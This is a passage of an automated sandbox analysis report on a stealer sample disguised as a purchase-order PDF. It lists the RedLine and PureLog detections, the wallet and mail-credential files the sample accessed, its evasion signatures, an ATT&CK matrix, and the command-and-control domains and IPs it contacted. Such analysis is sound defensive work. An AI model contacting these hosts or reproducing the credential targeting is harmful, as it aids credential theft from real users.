                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                            Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                            Tries to steal Mail credentials (via file / registry access)
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000000.2075282784.0000000000482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeBinary or memory string: WIN_XP
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeBinary or memory string: WIN_XPe
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeBinary or memory string: WIN_VISTA
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeBinary or memory string: WIN_7
                            Source: Yara matchFile source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: build.exe PID: 7064, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 5.3.microsofts.exe.590000.1148.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.6e3718.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.6000000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.svchost.exe.6000000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.590000.1051.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.5b0000.1147.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.590000.913.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.5b0000.1146.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.microsofts.exe.6e3718.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Native_Redline_BTC.exe.10000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.2424106953.0000000007240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.2419729495.0000000007240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2128865412.0000000006000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.12354d08.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.123eb188.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.123eb188.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.build.exe.bc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.1239ff50.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.1239ff50.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.Native_Redline_BTC.exe.12354d08.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2132146464.0000000012309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2132146464.0000000012397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.2126000556.0000000000BC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Native_Redline_BTC.exe PID: 6180, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: build.exe PID: 7064, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_004741BB
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,3_2_0046483C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,3_2_0047AD92

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire Infrastructure2
                            Valid Accounts                            		331
                            Windows Management Instrumentation                            		2
                            LSASS Driver                            		1
                            Exploitation for Privilege Escalation                            		111
                            Disable or Modify Tools                            		2
                            OS Credential Dumping                            		11
                            System Time Discovery                            		1
                            Taint Shared Content                            		11
                            Archive Collected Data                            		4
                            Ingress Tool Transfer                            		Exfiltration Over Other Network Medium1
                            System Shutdown/Reboot
                            CredentialsDomainsDefault Accounts21
                            Native API                            		1
                            DLL Side-Loading                            		1
                            Abuse Elevation Control Mechanism                            		11
                            Deobfuscate/Decode Files or Information                            		121
                            Input Capture                            		1
                            Account Discovery                            		Remote Desktop Protocol4
                            Data from Local System                            		11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter                            		2
                            Valid Accounts                            		2
                            LSASS Driver                            		1
                            Abuse Elevation Control Mechanism                            		1
                            Credentials in Registry                            		3
                            File and Directory Discovery                            		SMB/Windows Admin Shares1
                            Email Collection                            		1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Scheduled Task/Job                            		1
                            Windows Service                            		1
                            DLL Side-Loading                            		4
                            Obfuscated Files or Information                            		NTDS238
                            System Information Discovery                            		Distributed Component Object Model121
                            Input Capture                            		4
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts2
                            Service Execution                            		1
                            Scheduled Task/Job                            		2
                            Valid Accounts                            		12
                            Software Packing                            		LSA Secrets1
                            Query Registry                            		SSH4
                            Clipboard Data                            		125
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled Task2
                            Registry Run Keys / Startup Folder                            		21
                            Access Token Manipulation                            		1
                            Timestomp                            		Cached Domain Credentials641
                            Security Software Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                            Windows Service                            		1
                            DLL Side-Loading                            		DCSync351
                            Virtualization/Sandbox Evasion                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job212
                            Process Injection                            		322
                            Masquerading                            		Proc Filesystem3
                            Process Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt1
                            Scheduled Task/Job                            		2
                            Valid Accounts                            		/etc/passwd and /etc/shadow11
                            Application Window Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCron2
                            Registry Run Keys / Startup Folder                            		351
                            Virtualization/Sandbox Evasion                            		Network Sniffing1
                            System Owner/User Discovery                            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                            Access Token Manipulation                            		Input Capture1
                            System Network Configuration Discovery                            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task212
                            Process Injection                            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530636 Sample: PO-NBQ73652_ORDER_T637MOO74... Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 84 zyiexezl.biz 2->84 86 zlenh.biz 2->86 88 78 other IPs or domains 2->88 112 Multi AV Scanner detection for domain / URL 2->112 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 13 other signatures 2->118 12 PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe 1 2->12         started        15 alg.exe 2->15         started        18 elevation_service.exe 2->18         started        20 20 other processes 2->20 signatures3 process4 dnsIp5 136 Switches to a custom stack to bypass stack traces 12->136 138 Contains functionality to detect sleep reduction / modifications 12->138 22 PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe 12->22         started        25 svchost.exe 12->25         started        92 mnjmhp.biz 47.129.31.212, 49929, 50033, 50036 ESAMARA-ASRU Canada 15->92 94 yauexmxk.biz 18.208.156.248, 49992, 50025, 50029 AMAZON-AESUS United States 15->94 96 10 other IPs or domains 15->96 140 Creates files in the system32 config directory 15->140 142 Contains functionality to behave differently if execute on a Russian/Kazak computer 15->142 144 Found direct / indirect Syscall (likely to bypass EDR) 18->144 146 Creates files inside the volume driver (system volume information) 20->146 signatures6 process7 signatures8 120 Writes to foreign memory regions 22->120 122 Maps a DLL or memory area into another process 22->122 27 svchost.exe 4 22->27         started        process9 file10 78 C:\Users\user\AppData\...\microsofts.exe, PE32 27->78 dropped 80 C:\Users\user\...80ative_Redline_BTC.exe, PE32 27->80 dropped 82 C:\Program Files (x86)\...\armsvc.exe, PE32 27->82 dropped 148 Drops executable to a common third party application directory 27->148 150 Infects executable files (exe, dll, sys, html) 27->150 31 microsofts.exe 15 2 27->31         started        36 Native_Redline_BTC.exe 27->36         started        signatures11 process12 dnsIp13 98 banwyw.biz 44.221.84.105, 49711, 49716, 49954 AMAZON-AESUS United States 31->98 100 acwjcqqv.biz 18.141.10.107, 49707, 49710, 49717 AMAZON-02US United States 31->100 102 7 other IPs or domains 31->102 64 C:\Windows\System32\wbengine.exe, PE32+ 31->64 dropped 66 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 31->66 dropped 68 C:\Windows\System32\vds.exe, PE32+ 31->68 dropped 74 140 other malicious files 31->74 dropped 104 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 31->104 106 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 31->106 108 Tries to steal Mail credentials (via file / registry access) 31->108 110 6 other signatures 31->110 70 C:\Users\user\AppData\...\server_BTC.exe, PE32 36->70 dropped 72 C:\Users\user\AppData\Local\Temp\build.exe, PE32 36->72 dropped 38 build.exe 36->38         started        42 server_BTC.exe 36->42         started        file14 signatures15 process16 dnsIp17 90 212.162.149.53, 2049, 49706 UNREAL-SERVERSUS Netherlands 38->90 124 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 38->124 126 Found many strings related to Crypto-Wallets (likely being stolen) 38->126 128 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 38->128 134 2 other signatures 38->134 76 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 42->76 dropped 130 Uses schtasks.exe or at.exe to add and modify task schedules 42->130 132 Adds a directory exclusion to Windows Defender 42->132 45 powershell.exe 42->45         started        48 cmd.exe 42->48         started        50 schtasks.exe 42->50         started        52 TrojanAIbot.exe 42->52         started        file18 signatures19 process20 signatures21 152 Loading BitLocker PowerShell Module 45->152 54 conhost.exe 45->54         started        56 WmiPrvSE.exe 45->56         started        58 conhost.exe 48->58         started        60 timeout.exe 48->60         started        62 conhost.exe 50->62         started        process22

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe32%ReversingLabsWin32.Spyware.Redline
                            PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe34%VirustotalBrowse
                            PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            uaafd.biz10%VirustotalBrowse
                            vjaxhpbji.biz11%VirustotalBrowse
                            pywolwnvd.biz12%VirustotalBrowse
                            s82.gocheapweb.com1%VirustotalBrowse
                            vrrazpdh.biz10%VirustotalBrowse
                            xlfhhhm.biz15%VirustotalBrowse
                            ctdtgwag.biz10%VirustotalBrowse
                            tbjrpv.biz12%VirustotalBrowse
                            hehckyov.biz11%VirustotalBrowse
                            warkcdu.biz10%VirustotalBrowse
                            lrxdmhrr.biz14%VirustotalBrowse
                            ytctnunms.biz11%VirustotalBrowse
                            przvgke.biz15%VirustotalBrowse
                            npukfztj.biz12%VirustotalBrowse
                            dwrqljrr.biz12%VirustotalBrowse
                            sxmiywsfv.biz14%VirustotalBrowse
                            ecxbwt.biz9%VirustotalBrowse
                            bghjpy.biz12%VirustotalBrowse
                            damcprvgv.biz11%VirustotalBrowse
                            gytujflc.biz15%VirustotalBrowse
                            gvijgjwkh.biz12%VirustotalBrowse
                            deoci.biz14%VirustotalBrowse
                            gnqgo.biz9%VirustotalBrowse
                            ocsvqjg.biz12%VirustotalBrowse
                            cvgrf.biz12%VirustotalBrowse
                            wllvnzb.biz12%VirustotalBrowse
                            lpuegx.biz12%VirustotalBrowse
                            iuzpxe.biz12%VirustotalBrowse
                            bumxkqgxu.biz10%VirustotalBrowse
                            api.ipify.org0%VirustotalBrowse
                            vyome.biz10%VirustotalBrowse
                            yhqqc.biz10%VirustotalBrowse
                            reczwga.biz9%VirustotalBrowse
                            nqwjmb.biz12%VirustotalBrowse
                            xccjj.biz11%VirustotalBrowse
                            dlynankz.biz12%VirustotalBrowse
                            vcddkls.biz12%VirustotalBrowse
                            gcedd.biz9%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%URL Reputationsafe
                            https://api.ip.sb/ip0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty0%URL Reputationsafe
                            https://api.ipify.org/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            uaafd.biz
                            		3.254.94.185
                            		truetrueunknown
                            vjaxhpbji.biz
                            		82.112.184.197
                            		truefalseunknown
                            pywolwnvd.biz
                            		54.244.188.177
                            		truetrueunknown
                            s82.gocheapweb.com
                            		51.195.88.199
                            		truefalseunknown
                            ytctnunms.biz
                            		3.94.10.34
                            		truetrueunknown
                            lrxdmhrr.biz
                            		54.244.188.177
                            		truetrueunknown
                            vrrazpdh.biz
                            		34.211.97.45
                            		truetrueunknown
                            ctdtgwag.biz
                            		3.94.10.34
                            		truetrueunknown
                            tbjrpv.biz
                            		34.246.200.160
                            		truetrueunknown
                            hehckyov.biz
                            		44.221.84.105
                            		truetrueunknown
                            xlfhhhm.biz
                            		47.129.31.212
                            		truetrueunknown
                            warkcdu.biz
                            		18.141.10.107
                            		truetrueunknown
                            npukfztj.biz
                            		44.221.84.105
                            		truetrueunknown
                            sxmiywsfv.biz
                            		13.251.16.150
                            		truetrueunknown
                            przvgke.biz
                            		172.234.222.143
                            		truefalseunknown
                            dwrqljrr.biz
                            		54.244.188.177
                            		truetrueunknown
                            ocsvqjg.biz
                            		3.254.94.185
                            		truetrueunknown
                            ecxbwt.biz
                            		54.244.188.177
                            		truetrueunknown
                            gytujflc.biz
                            		208.100.26.245
                            		truefalseunknown
                            bghjpy.biz
                            		34.211.97.45
                            		truetrueunknown
                            damcprvgv.biz
                            		18.208.156.248
                            		truetrueunknown
                            gvijgjwkh.biz
                            		3.94.10.34
                            		truetrueunknown
                            gnqgo.biz
                            		18.208.156.248
                            		truetrueunknown
                            deoci.biz
                            		18.208.156.248
                            		truetrueunknown
                            iuzpxe.biz
                            		13.251.16.150
                            		truetrueunknown
                            nqwjmb.biz
                            		35.164.78.200
                            		truetrueunknown
                            wllvnzb.biz
                            		18.141.10.107
                            		truetrueunknown
                            cvgrf.biz
                            		54.244.188.177
                            		truetrueunknown
                            lpuegx.biz
                            		82.112.184.197
                            		truefalseunknown
                            bumxkqgxu.biz
                            		44.221.84.105
                            		truetrueunknown
                            yhqqc.biz
                            		34.211.97.45
                            		truetrueunknown
                            api.ipify.org
                            		104.26.12.205
                            		truefalseunknown
                            vcddkls.biz
                            		18.141.10.107
                            		truetrueunknown
                            vyome.biz
                            		44.213.104.86
                            		truetrueunknown
                            dlynankz.biz
                            		85.214.228.140
                            		truefalseunknown
                            gcedd.biz
                            		13.251.16.150
                            		truetrueunknown
                            reczwga.biz
                            		44.221.84.105
